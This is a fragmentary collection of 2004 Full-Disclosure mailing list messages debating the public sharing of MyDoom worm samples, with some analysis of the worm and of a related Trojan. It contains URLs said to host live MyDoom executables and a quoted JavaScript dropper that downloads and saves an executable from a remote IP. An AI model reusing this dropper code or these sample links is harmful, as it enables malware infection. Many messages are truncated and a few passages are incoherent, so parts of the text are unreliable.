>
> Nick FitzGerald wrote:
>
> > And save me the almost inevitable full-disclosure mantra
> BS replies!
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.netsys.com/full-disclosure-charter.html
>
> heh.
>
>
Nick FitzGerald wrote:
And save me the almost inevitable full-disclosure mantra BS replies!
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
heh.
___
Ful
On Sun, 1 Feb 2004, Nick FitzGerald wrote:
> of it will "escape" (we see this often). And you want to subject the
> world to that threat because you want to spend hours and hours doing
> what has been done "well enough" in multiple professional security
> company labs for them to ship detection a
Nick FitzGerald wrote:
I know most of you will not believe this because you are so stupid you
already believe that live virus samples are _just_ information and
therefore _should_ be subject to "full disclosure" (this is a special
form of ignorance that very little empirical evidence seems able to
Please allow me to clarify - I merely intended to indicate that I know
Dan to be a man of personal and professional integrity, no endorsement
of the practice was intended, sorry for any confusion.
On Jan 31, 2004, at 2:54 PM, Nick FitzGerald wrote:
Roland Dobbins <[EMAIL PROTECTED]> wrote:
I k
Doesn't work in Mozilla v1.3.1 on Xandros v1.1 either, though the
message was "(111) Connection refused" by
http://mitglied.lycos.de/mycutewebspace, maybe they don't like Mozilla?
:-)
Our proxy shows the following path when you click the link:
http://freedns.afraid.org/blank.html
http://mitglied.
Ergh - the http://207.46.110.24/gateway/gateway.dll? address is only a
MSN MSGR site - sorry.
Dan
-Forwarded Message-
From: Paul Schmehl <[EMAIL PROTECTED]>
To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO
Kurt Weiske <[EMAIL PROTECTED]> wrote:
> Daniel and Mike, thanks for making those files available for those of us
> who wish to research this virus firsthand, instead of relying on
> (sometimes) wildly inaccurate media and "expert" reporting.
>
> Shame on McAfee for succeeding in intimidating a
Mike wrote:
That's unbelievable and incredibly lame of McAfee!!
Are we supposed to sit and wait for our free copies to be delivered to us by
the very people we are trying to stop from getting infected???
Daniel and Mike, thanks for making those files available for those of us
who wish to research
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Saturday 31 January 2004 16:37, Daniel Spisak wrote:
> Look, apparently this is not the list for me to be on. All I was trying
> to do at first was find B to analyze. Then I tried to provide it to
> people via email but that quickly escalated past w
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Look, apparently this is not the list for me to be on. All I was trying
to do at first was find B to analyze. Then I tried to provide it to
people via email but that quickly escalated past what I could
personally handle by myself. Then I gave the UR
On Sun, 1 Feb 2004, Thierry wrote:
> NF>that x employs people who think
> NF>there is integrity in both publicly
> NF>distributing viruses
>
> I read F u l l - D i s c l o s u r e
> not restricted Disclosure.
Exactly.
> Quit the whining and post something productive.
Hear, hear!
--
Yours
On Sat, 31 Jan 2004 09:35:13 PST, [EMAIL PROTECTED] said:
> The only difference between a 'script kiddie' and 90% of the 'security
> experts' out there are the tools they use.
Damn, I've been outed. The average script kiddie probably has more
exploits on their hard drive than I do, I must be a
On Sun, 2004-02-01 at 06:08, Mike wrote:
> I have copied the files to the following locations:
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe
And so the virus spreads again. And by means not anticipated by its
author... Spre
Hi Daniel,
That's unbelievable and incredibly lame of McAfee!!
Are we supposed to sit and wait for our free copies to be delivered to us by
the very people we are trying to stop from getting infected???
I have copied the files to the following locations:
http://homepages.ihug.co.nz/~mjcarter/virus
NF>that x employs people who think
NF>there is integrity in both publicly
NF>distributing viruses
I read F u l l - D i s c l o s u r e
not restricted Disclosure.
I applaud the person who posted the B variant, for me the only chance
to "analyse" that one.
NF> after repackaging them with a "d
Hello Steve,
* Steve Wray <[EMAIL PROTECTED]> [2004-01-31 23:00]:
> > You can always disassemble the virus, which is what people
> > will do if it's a real "popular" one such as MyDoom.
>
> IIRC there are viruses that are encrypted and are almost impossible
> to disassemble?
>
> Would that be
Roland Dobbins <[EMAIL PROTECTED]> wrote:
> I know Dan Spisak personally, and can vouch for his honesty and
> integrity.
And _you_ are???
It seems you largely missed the point.
...
Anyway, it is interesting to know that Cisco employs people who think
there is integrity in both publicly distr
On Sun, 01 Feb 2004 10:46:09 +1300, Steve Wray <[EMAIL PROTECTED]> said:
> but to address the points, as one person wrote, it's difficult to spread
> fast when you are trying to be stealthy; I would argue that if one is
> stealthy enough, one doesn't need to spread fast since one is trying to
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of
> Steve Wray
> Sent: Sunday, 1 February 2004 10:46 a.m.
> To: 'Paul Schmehl'; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] MyDoom download info
>
> If a virus could spread slowly but stealthi
> [mailto:[EMAIL PROTECTED] On Behalf Of
> Paul Schmehl
>
> --On Saturday, January 31, 2004 12:25 PM -0500
> [EMAIL PROTECTED]
> wrote:
>
> > On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
> > <[EMAIL PROTECTED]> said:
> >
> > What worries me is we haven't seen *either* an actual damaging vir
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I have been asked by McAfee to take down my copy of MyDoom.B as they
have insinuated that I am now responsible for this virus spreading.
Sorry guys, I tried to help people out here but it would seem greater
powers are at work here. Don't email me as
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
So what's the difference between a script kiddie and a hacker in your
opinion? Would it be the same difference between the "cookie cutter"
security professionals and the actual professional? I'm curious.
[EMAIL PROTECTED] wrote:
The only differe
--On Saturday, January 31, 2004 12:25 PM -0500 [EMAIL PROTECTED]
wrote:
On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
<[EMAIL PROTECTED]> said:
What worries me is we haven't seen *either* an actual damaging virus
(imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format
c:);") or
--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron
<[EMAIL PROTECTED]> wrote:
The past Trojan horses which spread this way took advantage of the fact
web servers send an HTML 404 message if a file doesn't exist.
The original sample - britney.jpg - was simply an html file itself, and
using t
--On Saturday, January 31, 2004 3:44 PM -0500 "[EMAIL PROTECTED]"
<[EMAIL PROTECTED]> wrote:
Your mail to [EMAIL PROTECTED]; was filtered because of
the potential spam or virus keyword [gambling]
please contact the user by fax or telephone thank you.
For this email filter system and other power
> Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
> on any of the 6 public key servers I tried. Bonus points for (a) having
> a signature other than your own on the key, (b) having signatures to
> connect it into the "strongly-connected set", and (c) knowing what the
> stro
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- ---
Fedora Legacy Update Advisory
Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date: 2004-01-31
Produc
Kinda wanted to take a minute to think about this.
The big determiner between art and junk is passion. Regardless of what you
do, if you're a good information security person, or a good hacker, you have a
passion for the technology and the job. Doesn't really matter if you get
paid for it or not,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The only difference between a 'script kiddie' and 90% of the 'security
experts' out there are the tools they use.
They're both clueless but at least the 'script kiddie' didn't spend $5000
on ISS Hackcamp to learn his techniques.
-BEGIN PGP SIG
Here's the other frame...
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://211.19.46.20/5.exe ",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\
The past Trojan horses which spread this way took advantage of the fact
web servers send an HTML 404 message if a file doesn't exist.
The original sample - britney.jpg - was simply an html file itself, and
using that fact, and IE loading it. It was combined with one of the
latest exploits of th
On Fri, 30 Jan 2004 17:07:12 PST, Daniel Spisak said:
> from, let alone the fact that I PGP sign all my email to this list?
Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
on any of the 6 public key servers I tried. Bonus points for (a) having
a signature other than your
On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]> said:
> I've often thought that none of the viruses so far encountered on the
> net are actually serious.
>
> What worries me are the viruses that have been around for a while
> and which have, so far, not been detected; these ar
I apologize if in my previous email I didn't make it clear, this is an
important issue for system administrators world wide, so I am emailing
again in regard to this subject alone - a time table for the Mydoom DDoS
attack.
In my post from the 30th of January with the subject: "Refuting
tall-ta
Hi,
> OK, this can readily be deducted somewhat from the mydoom.exe but not
> entirely. Ironically aladdin systems can find itself back in the worm's
> 'strings' output... a part of it is compressed with stuffit.
Are you looking at the files from the URLs posted yesterday? Those
were packed with
Hello last
On 31 January 2004, 13:07:27, you wrote:
>> > It's still UPX packed, but it won't unpack with "UPX -d" because the
>>author
>> > used a simple UPX scrambler. Either undo what he did or unpack it
>>manually
This below VMware run and legalized this also we can at that time we be
aware of bec
mail me! :)
On Saturday, 31 January 2004 00:24, Remko Lodder wrote:
> "all i can say is they have to start somewhere"
>
> --> That is why my friends and i started Mostly-Harmless,
> we educate those persons by telling them what is good and what
> is wrong, so we can convince them script kiddie is not good
> ha
I know Dan Spisak personally, and can vouch for his honesty and
integrity.
On Jan 30, 2004, at 4:38 PM, Scott Taylor wrote:
Am I the only one that found it to be a little bit shady that these
were
made available as executables? Is the "B" version posted somewhere as
just a plain zip? I don't se
Sophos says:
(sync-1.01; andy; I'm just doing my job, nothing personal, sorry)
OK, this can readily be deducted somewhat from the mydoom.exe but not
entirely. Ironically aladdin systems can find itself back in the worm's
'strings' output... a part of it is compressed with stuffit.
[download
Is it possible that we never analyze the whole picture, and virii is much more
coordinated?
REST stands for REpresentational State Transfer, and is an architectural style for
large-scale software design.
REST suggests that what the Web got right is having a small, globally defined set of
remo
> >It actually un-UPX-ed just fine for me. What version have you been trying?
>
> MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you
> have to do it manually which shouldn't be a problem.
Oh, that clarifies it - I've just been looking at a copy of .A as it came to
me ama
> It's still UPX packed, but it won't unpack with "UPX -d" because the author
> used a simple UPX scrambler. Either undo what he did or unpack it manually
> and you'll see all the code.
It actually un-UPX-ed just fine for me. What version have you been trying?
It disassembled nicely after that.
> It's still UPX packed, but it won't unpack with "UPX -d" because the
author
> used a simple UPX scrambler. Either undo what he did or unpack it
manually
> and you'll see all the code.
It actually un-UPX-ed just fine for me. What version have you been trying?
MyDoom.B as posted by someone else
BTW, apparently there is a yet undiscovered bug in MyDoom.B code
that prevents it from spreading effectively. Much of the code is
encrypted, so dissecting proceeds slowly.
It's still UPX packed, but it won't unpack with "UPX -d" because the author
used a simple UPX scrambler. Either undo what he d
Hello,
>http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe
Run it under VMware and confirmed. Aladdin Stuffit format self-
extracting archive, contains MyDoom.B worm executable (29,184 bytes)
inside.
However the AV industry standard is always to send virus samples in
passworded ZIP archive
I think Daniel E. Spisak is quite right
why would anyone post a virus/backdoor creation of his
own?
Also if he wanted, he would have distributed it in executable form, not
the zipped one, right?
- Original Message -
From: "first last" <[EMAIL PR